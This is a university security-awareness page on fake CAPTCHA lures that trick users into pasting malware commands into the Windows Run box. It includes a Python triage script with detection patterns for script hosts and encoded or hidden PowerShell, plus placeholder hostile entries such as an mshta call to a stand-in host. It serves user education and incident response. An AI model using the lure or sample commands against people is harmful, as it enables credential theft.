What is a Fake CAPTCHA?
We are all used to browsing to websites and being asked to complete a CAPTCHA verification. These are simple tests that aim to determine whether a user is human, and they are presented in different ways; some may be selecting images with a specific item inside, similar to the image below, or they could be typing in a series of letters and numbers that appear in a distorted image on screen.

Threat actors are now creating fake CAPTCHA tests on websites that request a user perform a set of simple instructions that are presented as legitimate, but will in fact run malicious code.
Typically, these CAPTCHAs are on malicious websites to which people are directed via a phishing attack, or they could be placed on a legitimate website that has been hijacked to display malicious content. We have seen this at the University of Staffordshire targeting our users; the image below shows one example:

How do these work?
If you click the “I’m not a robot” button, it will secretly copy malicious code to your device’s clipboard without any notification – you won’t know!
The “Verification Steps” pop-up will then appear on your screen with instructions to:
1) “Press Windows Button + R” – this opens the “Run” dialogue box, which is used to launch programs or files.
2) “Press CTRL + V” – this pastes the copied malicious code into the free-type area of the “Run” dialogue box.
3) “Press Enter” – this runs the malicious code on your device.
Even though the code can appear to be random letters and numbers, it is actually malicious code in disguise that will execute a malware file. Sometimes the code can look less suspicious:

However, it is simply being presented in a way that seems more legitimate; the code is still disguised, and the outcome remains the same – it will execute malware on your device.
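For anyone triaging a device after one of these prompts, the three steps above leave a trace: whatever was pasted with CTRL + V is the text the “Run” box submitted, and Windows keeps the most recent Run entries under the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU. The following script is an added illustration, not the university’s tooling: it takes a list of such entries (constructed sample strings, supplied inline so it runs anywhere) and flags the hallmarks described above and in the “less suspicious” variant: a script interpreter launched from Run, a remote address, an encoded command, a hidden window, a long blob of random-looking letters and numbers, or comment text that only exists to make the line read like a verification code. The heuristics and the `example.invalid` address are assumptions made for this example.

```python
"""Triage of strings submitted through the Windows Run dialog.

Added illustration for the fake-CAPTCHA (paste-into-Run) pattern described
above. The heuristics and the sample entries are constructed for this example;
they are not the university's tooling or detections.

On a real machine the recent Run entries live under
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU; here they
are supplied as a plain dictionary so the code runs on any platform.
"""
from __future__ import annotations

import re

# Interpreters and download tools a genuine CAPTCHA never needs a user to launch.
SCRIPT_HOSTS = {
    "powershell", "powershell.exe", "pwsh", "pwsh.exe",
    "mshta", "mshta.exe", "cmd", "cmd.exe",
    "wscript", "wscript.exe", "cscript", "cscript.exe",
    "curl", "curl.exe", "certutil", "certutil.exe",
}

URL_RE = re.compile(r"https?://", re.IGNORECASE)
# PowerShell accepts abbreviated parameter names, so match the common short forms too.
ENCODED_FLAG_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\b", re.IGNORECASE)
HIDDEN_FLAG_RE = re.compile(r"(?:^|\s)-w(?:indowstyle)?\s+hidden\b", re.IGNORECASE)
# A long run of base64-style characters: the "random letters and numbers" look.
BLOB_RE = re.compile(r"[A-Za-z0-9+/=]{40,}")
# Human-readable text after a comment marker (# for PowerShell, :: or REM for
# cmd) mentioning robots/CAPTCHA/verification: padding that makes the line look
# like a harmless verification string.
PADDING_RE = re.compile(r"(?:#|::|\brem\s).*\b(?:robot|captcha|verif)", re.IGNORECASE)


def triage_run_entry(entry: str) -> list[str]:
    """Return the reasons an entry looks like a fake-CAPTCHA payload.

    An empty list means nothing on the checklist matched. This is a triage aid
    for responders, not a verdict: legitimate admin one-liners can trip it.
    """
    reasons: list[str] = []
    stripped = entry.strip()
    if not stripped:
        return reasons
    # First token is the program being launched; drop any path and quoting.
    first = stripped.split()[0].strip('"').lower()
    first = first.rsplit("\\", 1)[-1].rsplit("/", 1)[-1]
    if first in SCRIPT_HOSTS:
        reasons.append(f"launches script host '{first}'")
    if URL_RE.search(stripped):
        reasons.append("references a remote location")
    if ENCODED_FLAG_RE.search(stripped):
        reasons.append("uses an encoded command flag")
    if HIDDEN_FLAG_RE.search(stripped):
        reasons.append("asks for a hidden window")
    if BLOB_RE.search(stripped):
        reasons.append("contains a long base64-style blob")
    if PADDING_RE.search(stripped):
        reasons.append("padded with CAPTCHA-themed comment text")
    return reasons


def triage_all(entries: dict[str, str]) -> dict[str, list[str]]:
    """Run triage_run_entry over a name -> command mapping."""
    return {name: triage_run_entry(cmd) for name, cmd in entries.items()}


# Constructed sample entries (illustrative only; not taken from the page's
# screenshots). example.invalid is a reserved, non-resolving placeholder domain.
SAMPLE_RUN_ENTRIES = {
    "benign-notepad": "notepad",
    "benign-document": r"C:\Users\staff\Documents\report.docx",
    "fake-remote-script": "mshta http://example.invalid/verify",
    "fake-encoded": "powershell -nop -enc " + "Q" * 60,  # placeholder blob
    "fake-disguised": (
        'powershell -w hidden -c "<command omitted>" '
        "# I am not a robot - reCAPTCHA Verification ID: 7624"
    ),
}

if __name__ == "__main__":
    for name, reasons in triage_all(SAMPLE_RUN_ENTRIES).items():
        verdict = "REVIEW" if reasons else "ok"
        print(f"{verdict:6} {name}: {'; '.join(reasons) or 'no indicators'}")
```

The checks deliberately overlap: the disguised variant trips on the hidden-window flag and the comment padding even when the command body itself is unreadable, which is the point of the “less suspicious” presentation. Treat any REVIEW result on a user’s device as a reason to follow the password-reset and reporting advice below, not as proof of compromise on its own.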
IMPORTANT: Genuine CAPTCHA verifications will not ask you to perform the commands noted above, or to load any additional programs or windows.
The ultimate purpose behind this is to run malicious code, and often this leads to “infostealer” malware being executed (such as the notorious Lumma Stealer), which aims to steal passwords and session tokens that are saved in, or in use by, your browser. This means that your accounts can easily be accessed, and attackers can even bypass multi-factor authentication (MFA) requirements and controls.
This type of malware is designed to be covert, so there are often no obvious signs that anything malicious has taken place until the stolen credentials and tokens are used to take over an account.
If you have fallen victim to this scam and your staff account or device may be affected, please reset your password immediately from a different (non-infected) device and contact Digital Services – we will be more than happy to assist!
Remember, we would rather you report a legitimate email to us if you are unsure than to miss a malicious one!